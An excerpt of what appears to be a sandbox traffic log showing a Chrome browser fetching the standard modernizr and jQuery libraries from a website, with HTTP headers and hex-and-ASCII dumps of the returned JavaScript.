5d 2b 76 41 28 fc cc 3b 01 80 a1 2d 2d
                                                        Data Ascii: lS0}x 4FlV|\?s<NgSE,c6|nkqL^aDoM7l'Ub6{i3?M?~-LDQU:G|p3[29F<=v6I``GUd<wd~uR,X\5]+vA(;--


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        17192.168.2.549752104.21.64.14436912C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-15 00:17:55 UTC615OUTGET /static/js/modernizr-3.5.0.min.js HTTP/1.1
                                                        Host: www.36fg.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: */*
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: script
                                                        Referer: https://www.36fg.com/tp-Related/18104.html
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: PHPSESSID=qno9ediiiks7rknnfcfm2el0s6
                                                        2025-03-15 00:17:56 UTC997INHTTP/1.1 200 OK
                                                        Date: Sat, 15 Mar 2025 00:17:56 GMT
                                                        Content-Type: application/javascript
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        last-modified: Fri, 09 Jul 2021 02:03:32 GMT
                                                        vary: Accept-Encoding
                                                        etag: W/"60e7ae74-21bc"
                                                        expires: Sat, 15 Mar 2025 04:16:24 GMT
                                                        Cache-Control: max-age=43200
                                                        strict-transport-security: max-age=31536000
                                                        Age: 28896
                                                        cf-cache-status: HIT
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Zzyo1vzXLdyMrEs1YCOdyvjWKA6UPFYtPxaARycepSKye2cwirMLEHEhiXqemooJkKcn10RRM6yQAmKeQvD85GMq9761%2FUDpUq5l74D4HmS93DM%2B2ZsAJmsBoQEhAd8%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 9207d4a4f8140f80-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1657&min_rtt=1655&rtt_var=625&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2816&recv_bytes=1187&delivery_rate=1746411&cwnd=200&unsent_bytes=0&cid=646e199a1945c39b&ts=153&x=0"
                                                        2025-03-15 00:17:56 UTC372INData Raw: 32 31 62 63 0d 0a 2f 2a 21 20 6d 6f 64 65 72 6e 69 7a 72 20 33 2e 35 2e 30 20 28 43 75 73 74 6f 6d 20 42 75 69 6c 64 29 20 7c 20 4d 49 54 20 2a 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 6d 6f 64 65 72 6e 69 7a 72 2e 63 6f 6d 2f 64 6f 77 6e 6c 6f 61 64 2f 3f 2d 63 73 73 61 6e 69 6d 61 74 69 6f 6e 73 2d 63 73 73 63 6f 6c 75 6d 6e 73 2d 63 75 73 74 6f 6d 65 6c 65 6d 65 6e 74 73 2d 66 6c 65 78 62 6f 78 2d 68 69 73 74 6f 72 79 2d 70 69 63 74 75 72 65 2d 70 6f 69 6e 74 65 72 65 76 65 6e 74 73 2d 70 6f 73 74 6d 65 73 73 61 67 65 2d 73 69 7a 65 73 2d 73 72 63 73 65 74 2d 77 65 62 67 6c 2d 77 65 62 73 6f 63 6b 65 74 73 2d 77 65 62 77 6f 72 6b 65 72 73 2d 61 64 64 74 65 73 74 2d 64 6f 6d 70 72 65 66 69 78 65 73 2d 68 61 73 65 76 65 6e 74 2d 6d 71 2d 70 72 65 66 69 78 65
                                                        Data Ascii: 21bc/*! modernizr 3.5.0 (Custom Build) | MIT * * https://modernizr.com/download/?-cssanimations-csscolumns-customelements-flexbox-history-picture-pointerevents-postmessage-sizes-srcset-webgl-websockets-webworkers-addtest-domprefixes-hasevent-mq-prefixe
                                                        2025-03-15 00:17:56 UTC1369INData Raw: 3d 74 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 29 7b 76 61 72 20 65 2c 74 2c 6e 2c 6f 2c 69 2c 73 2c 61 3b 66 6f 72 28 76 61 72 20 6c 20 69 6e 20 43 29 69 66 28 43 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 6c 29 29 7b 69 66 28 65 3d 5b 5d 2c 74 3d 43 5b 6c 5d 2c 74 2e 6e 61 6d 65 26 26 28 65 2e 70 75 73 68 28 74 2e 6e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 2c 74 2e 6f 70 74 69 6f 6e 73 26 26 74 2e 6f 70 74 69 6f 6e 73 2e 61 6c 69 61 73 65 73 26 26 74 2e 6f 70 74 69 6f 6e 73 2e 61 6c 69 61 73 65 73 2e 6c 65 6e 67 74 68 29 29 66 6f 72 28 6e 3d 30 3b 6e 3c 74 2e 6f 70 74 69 6f 6e 73 2e 61 6c 69 61 73 65 73 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 65 2e 70 75 73 68 28 74 2e 6f 70 74 69 6f 6e 73 2e 61 6c 69 61 73 65 73 5b 6e 5d 2e 74 6f 4c 6f 77 65
                                                        Data Ascii: =t}function o(){var e,t,n,o,i,s,a;for(var l in C)if(C.hasOwnProperty(l)){if(e=[],t=C[l],t.name&&(e.push(t.name.toLowerCase()),t.options&&t.options.aliases&&t.options.aliases.length))for(n=0;n<t.options.aliases.length;n++)e.push(t.options.aliases[n].toLowe
                                                        2025-03-15 00:17:56 UTC1369INData Raw: 3f 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 4e 53 2e 63 61 6c 6c 28 74 2c 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 2c 61 72 67 75 6d 65 6e 74 73 5b 30 5d 29 3a 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 2e 61 70 70 6c 79 28 74 2c 61 72 67 75 6d 65 6e 74 73 29 7d 66 75 6e 63 74 69 6f 6e 20 6c 28 29 7b 76 61 72 20 65 3d 74 2e 62 6f 64 79 3b 72 65 74 75 72 6e 20 65 7c 7c 28 65 3d 61 28 78 3f 22 73 76 67 22 3a 22 62 6f 64 79 22 29 2c 65 2e 66 61 6b 65 3d 21 30 29 2c 65 7d 66 75 6e 63 74 69 6f 6e 20 75 28 65 2c 6e 2c 72 2c 6f 29 7b 76 61 72 20 69 2c 73 2c 75 2c 66 2c 64 3d 22 6d 6f 64 65 72 6e 69 7a 72 22 2c 63 3d 61 28 22 64 69 76 22 29 2c 70 3d 6c 28 29 3b 69 66 28 70 61 72 73 65 49 6e 74 28 72 2c 31 30 29 29
                                                        Data Ascii: ?t.createElementNS.call(t,"http://www.w3.org/2000/svg",arguments[0]):t.createElement.apply(t,arguments)}function l(){var e=t.body;return e||(e=a(x?"svg":"body"),e.fake=!0),e}function u(e,n,r,o){var i,s,u,f,d="modernizr",c=a("div"),p=l();if(parseInt(r,10))
                                                        2025-03-15 00:17:56 UTC1369INData Raw: 73 68 28 22 28 22 2b 64 28 74 5b 6f 5d 29 2b 22 3a 22 2b 72 2b 22 29 22 29 3b 72 65 74 75 72 6e 20 69 3d 69 2e 6a 6f 69 6e 28 22 20 6f 72 20 22 29 2c 75 28 22 40 73 75 70 70 6f 72 74 73 20 28 22 2b 69 2b 22 29 20 7b 20 23 6d 6f 64 65 72 6e 69 7a 72 20 7b 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 20 7d 20 7d 22 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 22 61 62 73 6f 6c 75 74 65 22 3d 3d 63 28 65 2c 6e 75 6c 6c 2c 22 70 6f 73 69 74 69 6f 6e 22 29 7d 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6d 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 72 65 70 6c 61 63 65 28 2f 28 5b 61 2d 7a 5d 29 2d 28 5b 61 2d 7a 5d 29 2f 67 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 72 65 74 75 72 6e 20 74 2b 6e 2e 74 6f 55 70 70
                                                        Data Ascii: sh("("+d(t[o])+":"+r+")");return i=i.join(" or "),u("@supports ("+i+") { #modernizr { position: absolute; } }",function(e){return"absolute"==c(e,null,"position")})}return n}function m(e){return e.replace(/([a-z])-([a-z])/g,function(e,t,n){return t+n.toUpp
                                                        2025-03-15 00:17:56 UTC1369INData Raw: 7d 2c 61 64 64 54 65 73 74 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 43 2e 70 75 73 68 28 7b 6e 61 6d 65 3a 65 2c 66 6e 3a 74 2c 6f 70 74 69 6f 6e 73 3a 6e 7d 29 7d 2c 61 64 64 41 73 79 6e 63 54 65 73 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 43 2e 70 75 73 68 28 7b 6e 61 6d 65 3a 6e 75 6c 6c 2c 66 6e 3a 65 7d 29 7d 7d 2c 4d 6f 64 65 72 6e 69 7a 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 4d 6f 64 65 72 6e 69 7a 72 2e 70 72 6f 74 6f 74 79 70 65 3d 62 2c 4d 6f 64 65 72 6e 69 7a 72 3d 6e 65 77 20 4d 6f 64 65 72 6e 69 7a 72 3b 76 61 72 20 77 3d 5b 5d 2c 53 3d 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2c 78 3d 22 73 76 67 22 3d 3d 3d 53 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 5f 3d 22 4d 6f 7a 20 4f 20 6d 73
                                                        Data Ascii: },addTest:function(e,t,n){C.push({name:e,fn:t,options:n})},addAsyncTest:function(e){C.push({name:null,fn:e})}},Modernizr=function(){};Modernizr.prototype=b,Modernizr=new Modernizr;var w=[],S=t.documentElement,x="svg"===S.nodeName.toLowerCase(),_="Moz O ms
                                                        2025-03-15 00:17:56 UTC1369INData Raw: 74 63 68 65 73 7c 7c 21 31 7d 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 21 31 3b 72 65 74 75 72 6e 20 75 28 22 40 6d 65 64 69 61 20 22 2b 74 2b 22 20 7b 20 23 6d 6f 64 65 72 6e 69 7a 72 20 7b 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 20 7d 20 7d 22 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 6e 3d 22 61 62 73 6f 6c 75 74 65 22 3d 3d 28 65 2e 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 3f 65 2e 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 28 74 2c 6e 75 6c 6c 29 3a 74 2e 63 75 72 72 65 6e 74 53 74 79 6c 65 29 2e 70 6f 73 69 74 69 6f 6e 7d 29 2c 6e 7d 7d 28 29 3b 62 2e 6d 71 3d 7a 3b 76 61 72 20 42 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 21 31 2c 72 3d 61 28 22 64 69 76 22 29 2c 6f 3d 72 2e 73 74 79
                                                        Data Ascii: tches||!1}:function(t){var n=!1;return u("@media "+t+" { #modernizr { position: absolute; } }",function(t){n="absolute"==(e.getComputedStyle?e.getComputedStyle(t,null):t.currentStyle).position}),n}}();b.mq=z;var B=function(e,t){var n=!1,r=a("div"),o=r.sty
                                                        2025-03-15 00:17:56 UTC1369INData Raw: 43 6f 6e 74 65 78 74 22 3b 72 65 74 75 72 6e 20 6e 20 69 6e 20 74 3f 74 5b 6e 5d 28 22 77 65 62 67 6c 22 29 7c 7c 74 5b 6e 5d 28 22 65 78 70 65 72 69 6d 65 6e 74 61 6c 2d 77 65 62 67 6c 22 29 3a 22 57 65 62 47 4c 52 65 6e 64 65 72 69 6e 67 43 6f 6e 74 65 78 74 22 69 6e 20 65 7d 29 3b 76 61 72 20 52 3d 21 31 3b 74 72 79 7b 52 3d 22 57 65 62 53 6f 63 6b 65 74 22 69 6e 20 65 26 26 32 3d 3d 3d 65 2e 57 65 62 53 6f 63 6b 65 74 2e 43 4c 4f 53 49 4e 47 7d 63 61 74 63 68 28 6a 29 7b 7d 4d 6f 64 65 72 6e 69 7a 72 2e 61 64 64 54 65 73 74 28 22 77 65 62 73 6f 63 6b 65 74 73 22 2c 52 29 2c 4d 6f 64 65 72 6e 69 7a 72 2e 61 64 64 54 65 73 74 28 22 63 73 73 61 6e 69 6d 61 74 69 6f 6e 73 22 2c 79 28 22 61 6e 69 6d 61 74 69 6f 6e 4e 61 6d 65 22 2c 22 61 22 2c 21 30 29 29
                                                        Data Ascii: Context";return n in t?t[n]("webgl")||t[n]("experimental-webgl"):"WebGLRenderingContext"in e});var R=!1;try{R="WebSocket"in e&&2===e.WebSocket.CLOSING}catch(j){}Modernizr.addTest("websockets",R),Modernizr.addTest("cssanimations",y("animationName","a",!0))
                                                        2025-03-15 00:17:56 UTC58INData Raw: 64 65 72 6e 69 7a 72 2e 5f 71 5b 4d 5d 28 29 3b 65 2e 4d 6f 64 65 72 6e 69 7a 72 3d 4d 6f 64 65 72 6e 69 7a 72 7d 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 29 3b 0d 0a
                                                        Data Ascii: dernizr._q[M]();e.Modernizr=Modernizr}(window,document);
                                                        2025-03-15 00:17:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        18192.168.2.549753104.21.64.14436912C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-15 00:17:55 UTC613OUTGET /static/js/jquery-1.12.4.min.js HTTP/1.1
                                                        Host: www.36fg.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: */*
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: script
                                                        Referer: https://www.36fg.com/tp-Related/18104.html
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: PHPSESSID=qno9ediiiks7rknnfcfm2el0s6
                                                        2025-03-15 00:17:56 UTC1001INHTTP/1.1 200 OK
                                                        Date: Sat, 15 Mar 2025 00:17:56 GMT
                                                        Content-Type: application/javascript
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        last-modified: Fri, 09 Jul 2021 02:03:40 GMT
                                                        vary: Accept-Encoding
                                                        etag: W/"60e7ae7c-17b8b"
                                                        expires: Sat, 15 Mar 2025 02:28:22 GMT
                                                        Cache-Control: max-age=43200
                                                        strict-transport-security: max-age=31536000
                                                        CF-Cache-Status: HIT
                                                        Age: 35379
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ENuoQaLdgPbf%2Fb7xQTjvovq3G3gEwKJBDOUAxbr%2B4ib5pcj8cOBLQ9eix2MH8gsk0pdSJVuKqKFcJrTyFrJMfOninFebxcodx%2FUpNV6Z8l%2BNkaxp3XUN5H2E2s7a0QY%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 9207d4a50d3723dd-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2070&min_rtt=2060&rtt_var=794&sent=3&recv=6&lost=0&retrans=0&sent_bytes=2817&recv_bytes=1185&delivery_rate=1360037&cwnd=78&unsent_bytes=0&cid=b94d8ae61c0d1043&ts=127&x=0"
                                                        2025-03-15 00:17:56 UTC368INData Raw: 37 63 38 63 0d 0a 2f 2a 21 20 6a 51 75 65 72 79 20 76 31 2e 31 32 2e 34 20 7c 20 28 63 29 20 6a 51 75 65 72 79 20 46 6f 75 6e 64 61 74 69 6f 6e 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 61 2e 64 6f 63 75 6d 65 6e 74 3f 62 28 61 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 21 61 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72 65 71 75 69 72 65 73 20 61 20 77 69 6e 64 6f 77 20 77 69 74 68 20 61 20
                                                        Data Ascii: 7c8c/*! jQuery v1.12.4 | (c) jQuery Foundation | jquery.org/license */!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a
                                                        2025-03-15 00:17:56 UTC1369INData Raw: 65 2c 66 3d 63 2e 63 6f 6e 63 61 74 2c 67 3d 63 2e 70 75 73 68 2c 68 3d 63 2e 69 6e 64 65 78 4f 66 2c 69 3d 7b 7d 2c 6a 3d 69 2e 74 6f 53 74 72 69 6e 67 2c 6b 3d 69 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2c 6c 3d 7b 7d 2c 6d 3d 22 31 2e 31 32 2e 34 22 2c 6e 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 6e 2e 66 6e 2e 69 6e 69 74 28 61 2c 62 29 7d 2c 6f 3d 2f 5e 5b 5c 73 5c 75 46 45 46 46 5c 78 41 30 5d 2b 7c 5b 5c 73 5c 75 46 45 46 46 5c 78 41 30 5d 2b 24 2f 67 2c 70 3d 2f 5e 2d 6d 73 2d 2f 2c 71 3d 2f 2d 28 5b 5c 64 61 2d 7a 5d 29 2f 67 69 2c 72 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 62 2e 74 6f 55 70 70 65 72 43 61 73 65 28 29 7d 3b 6e 2e 66 6e 3d 6e 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 6a
                                                        Data Ascii: e,f=c.concat,g=c.push,h=c.indexOf,i={},j=i.toString,k=i.hasOwnProperty,l={},m="1.12.4",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={j
                                                        2025-03-15 00:17:56 UTC1369INData Raw: 5d 3d 6e 2e 65 78 74 65 6e 64 28 6a 2c 66 2c 63 29 29 3a 76 6f 69 64 20 30 21 3d 3d 63 26 26 28 67 5b 64 5d 3d 63 29 29 3b 72 65 74 75 72 6e 20 67 7d 2c 6e 2e 65 78 74 65 6e 64 28 7b 65 78 70 61 6e 64 6f 3a 22 6a 51 75 65 72 79 22 2b 28 6d 2b 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 29 2e 72 65 70 6c 61 63 65 28 2f 5c 44 2f 67 2c 22 22 29 2c 69 73 52 65 61 64 79 3a 21 30 2c 65 72 72 6f 72 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 61 29 7d 2c 6e 6f 6f 70 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 69 73 46 75 6e 63 74 69 6f 6e 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 3d 6e 2e 74 79 70 65 28 61 29 7d 2c 69 73 41 72 72 61 79 3a 41 72 72 61 79 2e 69 73 41 72 72 61 79
                                                        Data Ascii: ]=n.extend(j,f,c)):void 0!==c&&(g[d]=c));return g},n.extend({expando:"jQuery"+(m+Math.random()).replace(/\D/g,""),isReady:!0,error:function(a){throw new Error(a)},noop:function(){},isFunction:function(a){return"function"===n.type(a)},isArray:Array.isArray
                                                        2025-03-15 00:17:56 UTC1369INData Raw: 61 79 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 3d 62 7c 7c 5b 5d 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 61 26 26 28 73 28 4f 62 6a 65 63 74 28 61 29 29 3f 6e 2e 6d 65 72 67 65 28 63 2c 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 61 3f 5b 61 5d 3a 61 29 3a 67 2e 63 61 6c 6c 28 63 2c 61 29 29 2c 63 7d 2c 69 6e 41 72 72 61 79 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 76 61 72 20 64 3b 69 66 28 62 29 7b 69 66 28 68 29 72 65 74 75 72 6e 20 68 2e 63 61 6c 6c 28 62 2c 61 2c 63 29 3b 66 6f 72 28 64 3d 62 2e 6c 65 6e 67 74 68 2c 63 3d 63 3f 30 3e 63 3f 4d 61 74 68 2e 6d 61 78 28 30 2c 64 2b 63 29 3a 63 3a 30 3b 64 3e 63 3b 63 2b 2b 29 69 66 28 63 20 69 6e 20 62 26 26 62 5b 63 5d 3d 3d 3d 61 29 72 65 74 75 72 6e 20 63 7d 72 65
                                                        Data Ascii: ay:function(a,b){var c=b||[];return null!=a&&(s(Object(a))?n.merge(c,"string"==typeof a?[a]:a):g.call(c,a)),c},inArray:function(a,b,c){var d;if(b){if(h)return h.call(b,a,c);for(d=b.length,c=c?0>c?Math.max(0,d+c):c:0;d>c;c++)if(c in b&&b[c]===a)return c}re
                                                        2025-03-15 00:17:56 UTC1369INData Raw: 2c 72 2c 73 2c 74 2c 75 3d 22 73 69 7a 7a 6c 65 22 2b 31 2a 6e 65 77 20 44 61 74 65 2c 76 3d 61 2e 64 6f 63 75 6d 65 6e 74 2c 77 3d 30 2c 78 3d 30 2c 79 3d 67 61 28 29 2c 7a 3d 67 61 28 29 2c 41 3d 67 61 28 29 2c 42 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 61 3d 3d 3d 62 26 26 28 6c 3d 21 30 29 2c 30 7d 2c 43 3d 31 3c 3c 33 31 2c 44 3d 7b 7d 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2c 45 3d 5b 5d 2c 46 3d 45 2e 70 6f 70 2c 47 3d 45 2e 70 75 73 68 2c 48 3d 45 2e 70 75 73 68 2c 49 3d 45 2e 73 6c 69 63 65 2c 4a 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 66 6f 72 28 76 61 72 20 63 3d 30 2c 64 3d 61 2e 6c 65 6e 67 74 68 3b 64 3e 63 3b 63 2b 2b 29 69 66 28 61 5b 63 5d 3d 3d 3d 62 29 72 65 74 75 72 6e 20 63 3b 72 65 74 75 72 6e 2d
                                                        Data Ascii: ,r,s,t,u="sizzle"+1*new Date,v=a.document,w=0,x=0,y=ga(),z=ga(),A=ga(),B=function(a,b){return a===b&&(l=!0),0},C=1<<31,D={}.hasOwnProperty,E=[],F=E.pop,G=E.push,H=E.push,I=E.slice,J=function(a,b){for(var c=0,d=a.length;d>c;c++)if(a[c]===b)return c;return-
                                                        2025-03-15 00:17:56 UTC1369INData Raw: 7c 29 28 3f 3d 5b 5e 2d 5d 7c 24 29 22 2c 22 69 22 29 7d 2c 58 3d 2f 5e 28 3f 3a 69 6e 70 75 74 7c 73 65 6c 65 63 74 7c 74 65 78 74 61 72 65 61 7c 62 75 74 74 6f 6e 29 24 2f 69 2c 59 3d 2f 5e 68 5c 64 24 2f 69 2c 5a 3d 2f 5e 5b 5e 7b 5d 2b 5c 7b 5c 73 2a 5c 5b 6e 61 74 69 76 65 20 5c 77 2f 2c 24 3d 2f 5e 28 3f 3a 23 28 5b 5c 77 2d 5d 2b 29 7c 28 5c 77 2b 29 7c 5c 2e 28 5b 5c 77 2d 5d 2b 29 29 24 2f 2c 5f 3d 2f 5b 2b 7e 5d 2f 2c 61 61 3d 2f 27 7c 5c 5c 2f 67 2c 62 61 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 28 5b 5c 5c 64 61 2d 66 5d 7b 31 2c 36 7d 22 2b 4c 2b 22 3f 7c 28 22 2b 4c 2b 22 29 7c 2e 29 22 2c 22 69 67 22 29 2c 63 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 76 61 72 20 64 3d 22 30 78 22 2b 62 2d 36 35 35 33 36 3b 72 65 74 75
                                                        Data Ascii: |)(?=[^-]|$)","i")},X=/^(?:input|select|textarea|button)$/i,Y=/^h\d$/i,Z=/^[^{]+\{\s*\[native \w/,$=/^(?:#([\w-]+)|(\w+)|\.([\w-]+))$/,_=/[+~]/,aa=/'|\\/g,ba=new RegExp("\\\\([\\da-f]{1,6}"+L+"?|("+L+")|.)","ig"),ca=function(a,b,c){var d="0x"+b-65536;retu
                                                        2025-03-15 00:17:56 UTC1369INData Raw: 2d 2d 29 72 5b 68 5d 3d 6c 2b 22 20 22 2b 71 61 28 72 5b 68 5d 29 3b 73 3d 72 2e 6a 6f 69 6e 28 22 2c 22 29 2c 77 3d 5f 2e 74 65 73 74 28 61 29 26 26 6f 61 28 62 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 62 7d 69 66 28 73 29 74 72 79 7b 72 65 74 75 72 6e 20 48 2e 61 70 70 6c 79 28 64 2c 77 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 73 29 29 2c 64 7d 63 61 74 63 68 28 79 29 7b 7d 66 69 6e 61 6c 6c 79 7b 6b 3d 3d 3d 75 26 26 62 2e 72 65 6d 6f 76 65 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 7d 7d 7d 72 65 74 75 72 6e 20 69 28 61 2e 72 65 70 6c 61 63 65 28 51 2c 22 24 31 22 29 2c 62 2c 64 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 67 61 28 29 7b 76 61 72 20 61 3d 5b 5d 3b 66 75 6e 63 74 69 6f 6e 20 62 28 63 2c 65 29 7b 72 65 74 75 72 6e 20 61 2e 70
                                                        Data Ascii: --)r[h]=l+" "+qa(r[h]);s=r.join(","),w=_.test(a)&&oa(b.parentNode)||b}if(s)try{return H.apply(d,w.querySelectorAll(s)),d}catch(y){}finally{k===u&&b.removeAttribute("id")}}}return i(a.replace(Q,"$1"),b,d,e)}function ga(){var a=[];function b(c,e){return a.p
                                                        2025-03-15 00:17:56 UTC1369INData Raw: 3d 67 2e 6e 6f 64 65 54 79 70 65 26 26 67 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 3f 28 6e 3d 67 2c 6f 3d 6e 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2c 70 3d 21 66 28 6e 29 2c 28 65 3d 6e 2e 64 65 66 61 75 6c 74 56 69 65 77 29 26 26 65 2e 74 6f 70 21 3d 3d 65 26 26 28 65 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3f 65 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 75 6e 6c 6f 61 64 22 2c 64 61 2c 21 31 29 3a 65 2e 61 74 74 61 63 68 45 76 65 6e 74 26 26 65 2e 61 74 74 61 63 68 45 76 65 6e 74 28 22 6f 6e 75 6e 6c 6f 61 64 22 2c 64 61 29 29 2c 63 2e 61 74 74 72 69 62 75 74 65 73 3d 69 61 28 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 2e 63 6c 61 73 73 4e 61 6d 65 3d 22 69 22 2c 21 61 2e 67 65 74 41 74 74 72
                                                        Data Ascii: =g.nodeType&&g.documentElement?(n=g,o=n.documentElement,p=!f(n),(e=n.defaultView)&&e.top!==e&&(e.addEventListener?e.addEventListener("unload",da,!1):e.attachEvent&&e.attachEvent("onunload",da)),c.attributes=ia(function(a){return a.className="i",!a.getAttr
